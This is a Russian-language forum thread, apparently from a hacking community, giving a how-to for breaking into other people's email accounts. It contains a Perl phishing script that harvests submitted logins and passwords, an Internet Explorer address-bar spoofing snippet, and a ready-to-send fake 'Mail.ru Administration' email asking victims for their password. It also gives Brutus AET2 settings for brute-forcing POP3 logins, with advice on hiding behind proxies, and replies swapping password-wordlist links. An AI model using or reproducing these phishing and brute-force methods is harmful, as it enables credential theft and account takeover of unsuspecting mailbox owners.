Взлом мыла

В данной статье я хочу рассказать вам о способах взлома E-mail'a всвязи с очень большим кол-вом сообщений на эту тему:
Рассмотрим несколько способов:
1) Баг в IE + Соц. Инженерия
1) Троян
3) Находчивость
4) Грубая сила

Вариант 1.
Допустим вам известно, что жертва имеет IE и просматривает почту через Web интерфейс, тогда необходимо отправить ей письмо полностью идентичное системе идентификации, например такого вида: http://mail.yandex.ru/login

Все надо оставить таким же, вот только написать скрипт, который будет вам отсылать пароли на почту например... Этот скрипт выглядит приблизительно так:

&GetFormInput;
$name=$field{'name'};
$pass=$field{'pass'};

sub GetFormInput {

(*fval) = @_ if @_ ;
local ($buf);
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
}
else {
$buf=$ENV{'QUERY_STRING'};
}
if ($buf eq "&quot {
return 0 ;
}
else {
@fval=split(/&/,$buf);
foreach $i (0 .. $#fval){
($name,$val)=split (/=/,$fval[$i],2);
$val=~tr/+/ /;
$val=~ s/%(..)/pack("c",hex($1))/ge;
$name=~tr/+/ /;
$name=~ s/%(..)/pack("c",hex($1))/ge;

if (!defined($field{$name})) {
$field{$name}=$val;
}
else {
$field{$name} .= ",$val";
}
}
}
return 1;
}
open (OUTFILE, ">>pass.txt"
print OUTFILE "$name";
print OUTFILE "\n$pass";
print OUTFILE "\n=======END=======\n\n";
close (OUTFILE);
print "Location: http://your_redirect_URL\n"

А далее необходимо заюзать новый баг в IE с подменой адресной строки... Выглядит это так:

<button onclick="location.href=unescape('http://www.microsoft.com
@www.antichat.ru ');" style="font: 8pt verdana, sans-serif;" target="_new">


Проверить баг в IE



Теперь нажав на эту кнопку в адресной строке будет написано www.microsoft.com , а загрузится наш античат....

Теперь состыковав все эти 3 вещи мы отправляем юзеру письмо, в котором пишем про ошибку аутентификации, а после ввода пароля отправляем его уже на настоящую страницу авторизации...



Смысл этого скрипта состоит в том, что если у вас WinXP + MSIE, то в корне диска С запустив такой скрипт вы сможете найти файл nsd_ru_hello.txt
Но никто не мешает вам переделать этот скрипт под себя и заставить скачиваться заменяя WMPlayer например))
Это один из эффектнейших способов впаривания трояна....

3) Находчивость.
Рассмотрим момент, ничего не работает, Тогда идем на Секретный вопрос и смотрим туда.
Вариант 1. Нормальный вопрос: "Номер телефона"
Находим icq этого человека и если он порядочный ламер, то он ввел туда все, что нужно в том числе и свой номер телефона....
Вариант 2. Ненормальный вопрос: "а"
Вот тут уже все сложнее, но мне повезло в этом плане, и ответом на вопрос было "б"....

4) Грубая сила.
Нет смысла рассуждать на эту тему, берется программа: Brutus aet2 и устанавливается на перебор пароля по 1 логину...

------------------------------------------------------------
Большинство информации взято с сайта www.nsd.ru, так что скажем им "большое спасибо"...
Также я взял инфу с хакзоны... Ее разместил dima k-17.
------------------------------------------------------------
Естесственно это далеко не все варианты, но новичкам я рекомендую социальную инженерию...

Пишем письмо от админов (н-р: Администрация Mail.ru или Администрация Yandex.ru) . Адрес должен быть соответствующий, а то юзер догадется, если твой мейл будет ded-makar... Допустим, мы зарегистрировали аккаунт типа [email protected], что делаем дальше:
Тему ты выбираешь вроде "Подтверждение аккаунта vasja_pupkin"
Далее мы пишем:
Здравствуйте, Вася Пупкин!
 С Вашего почтового ящика [email protected] происходит рассылка спама. Возможно, кто-то умышленно рассылает спам от Вашего имени, но Вам нужно подтвердить свои права на этот ящик. Для этого Вам необходимо ответить на это письмо, в теме указав свои реквизиты для [email protected] в формате login;passwd.
С уважением, Администрация Mail.ru
Для убедительности я переводил на английский. В этом случае пароль высылало ок. 70 %.
Как видишь способов придумать можно вагон и маленькую тележку, но главное не переборщить со всем этим делом. Так , однажды, один "умник" написал, что mail.ru похакали и мне срочно нужно выслать пароль.
Че Гевара

 

З.Ы. Чуть не забыл... Всем известен баг в IE эксплорере 6 версии. Так что проще загрузить на комп exe файл, который, как троян, будет высылать вам расшифрованный пасс от мыла. Этот при условии, что юзер использует почтовую программу...

 

Рассмотрим, как взломать e-mail при помощи Brutus -AET2. Качаем его Отсюда
Взламывать другие веб-ресурсы этой программой затруднительно, а для мыла и новичков - самое то!
Ну, начнем  описание:
1. В поле Target (цель) мы вводим pop3.mail.ru или pop3.yandex.ru соответственно.
2. В Type(тип) мы выбираем pop3
3. Port ставится автоматически
4. Вот теперь приступим к настройкам, которые непосредственно влияют на скорость перебора паролей:
Connections(Кол-во одновременных подключений) - я ставлю до 45, а Timeout(Время ожидания, пауза) - на 15. Лично у меня модемное соединение... Насчет выделенки - не знаю.
5. Use Proxy (использовать прокси-сервер) - я вообще не юзаю. А зачем? В лог переборы все-равно не вносятся.
6. Authentication Options (опции аундефикации)- мы ставим галочку на
а) Use Username
б) Single User
7. В поле userID вписывам нужный ящик - [email protected]
7. Pass Mode - Word list (Перебор по словарю)
  Pass File - words.txt
Я хочу остановиться подробнее на словаре. Стандартный словарь уже не канает, так что надо либо скачивать другой или дополнять старый. Лично я дополнил его паролями вроде 123, 321, 007 и т.п. Все зависит от твоей терпеливости...
Допустим, мы взломали мыло. Все - бежим туда! А нет... Не совершайте таких ошибок, которые соваршил я. Обязательно заходите через прокси! В логе остается ip последнего зашедшего через http или pop3.
Вроде, я все расписал подробно. Если что-то не понятно, то спрашивайте.
Че Гевара

 

А можно как-нибудь пробутфорсить пароль на вопрос при напоминании пароля???????

 

Нет, там другая система... Видишь ли, принцип взлома брутусом состоит в том, что тебя пропускают в сам ящик. Т.е. Ты выбираешь pop3.mail.ru, а при удачном взломе попадаешь в другую дерикторию. То бишь, заход на ящик [email protected] с паролем 123 - удачен. А в системе востановления паролей:
1. Как ты укажешь дату рождения?
2. Он просто не сработает из-за того, что при любом варианте ответа, он пошлет вас на одну и туже страницу...
Если ты хочешь взломать мыло через систему восстановления паролей, то попробуй социальную инженерию.

 

Чем не удобен брутус, так это его списком паролей. Его писали англичане с ориентиром на пассы своих соотечественников. Нужно скачивать другую базу или дополнять "заводскую"

 

Сейчас почитаю ради интереса...А брутус этот...мягко  сказано, неудобен...но оно и понятно...

 

А ссылочек(работающих) на словарики никто не даст?

 

На античате есть...

 

Слить его можно отсюда http://antichat.ru/soft/words.zip

 

На www.passwords.ru  ..там можно неплохие словарики найти ...

 

Что-то не нашел я там словарей...

 

http://www.passwords.ru/dic.htm

 

Гы.. Смотрел не внимательно...

 

Скачал я русский словарь... Фуфло.

 

Не одного мыла с таким словарем не взломать

 

я бы сказал, с такими руками..

 

Не остроумно...

 

зато правдиво

 

Смотря кого рассматривать...